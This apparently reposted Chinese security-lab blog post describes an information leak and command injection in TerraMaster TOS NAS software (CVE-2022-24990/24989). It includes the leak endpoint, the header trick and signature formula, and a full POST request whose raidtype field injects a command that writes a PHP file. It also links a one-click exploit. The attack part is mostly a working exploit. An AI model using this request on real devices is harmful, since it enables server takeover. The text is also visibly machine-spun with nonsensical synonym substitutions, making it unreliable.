mg不朽情缘

84472_17022767220742

征询电话:400-6446-808

新闻动态

创安尝试室专栏丨TerraMaster TOS 信息泄漏到号令执行
2022-12-21 00:00:00
crop,h_449,w_800,x_0,y_0
171401694838af7ed3fe72e746cb643d-sz_456

 

 

 

 

 

 

 

 

 

 

古语有云:“学如逆水行舟,不进则退。”面对如今随时都在变动的网络安全环境更是如此。为此,mg不朽情缘微信公家号特开设“创安尝试室专栏”,以纪录mg不朽情缘创安尝试室在技术上的索求,加强同业间的互换,相互进建,共同进取。

 

?+

+

TerraMaster TOS 信息泄漏到号令执行

缝霞述

TerraMaster TOS 存在信息泄漏缝隙,攻击者通过缝隙能够获取服务器上的敏感信息,共同 CVE-2022-24989缝隙能够获取服务器权限

影响领域

TerraMaster TOS < 4.2.31

缝隙编号

CVE-2022-24990、CVE-2022-24989

缝隙等级

严沉

缝隙复现

目前表界Exp/PoC已公开,创安尝试室已验证该缝隙的可利用性:

zz_wzMzdJsZ

数据包中只必要增长 User-Agent: TNAS, 能够接见到敏感信息

poc: /module/api.php?mobile/webNasIPS

zz_S8PM7gwd

利用信息泄露的 PWD和mac地址,我们就能够利用这个号令执行缝隙了

在发送要求包写入 php恶意文件

其中md5(mac地址后三字节 + 当前功夫戳) = $_SERVER['HTTP_SIGNATURE']

POST /module/api.php?mobile/createRaid HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Authorization: PWD

Cache-Control: max-age=0

Content-Length: 82

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=; tos_visit_time=功夫戳

Signature: sign

Timestamp: 功夫戳

Upgrade-Insecure-Requests: 1

User-Agent: TNAS

 

raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Evuln1.php&diskstring=XXXX

 

这里利用https://github.com/lishang520/CVE-2022-24990进行一键获取和上传

zz_XUf2UtXm
zz_o6SaS0lk

建复建议

升级到安全版本

 

E·N·D

 

本文由mg不朽情缘创安尝试室编纂。

本文仅限于幼我进建和技术钻研,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者自己掌管,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权,如欲转载或传布此文章,必须保障此文章的齐全性,蕴含版权申明等全数内容。

 

如有侵权,请联系后盾。

 

 

 

创安尝试室

mg不朽情缘创安尝试室,是mg不朽情缘旗下的技术钻研团队,成立于2021年9月,重要钻研红蓝匹涤注沉大安全保险、应急响应等方向。

创安攻防尝试室圆满实现了屡次公安进行的沉要网络安全保险和攻防演习活动,并积极参与各类网络安全较量,屡获殊荣。

创安攻防尝试室秉承mg不朽情缘的发展理想,致力打造国内一流网络安全团队。

【网站地图】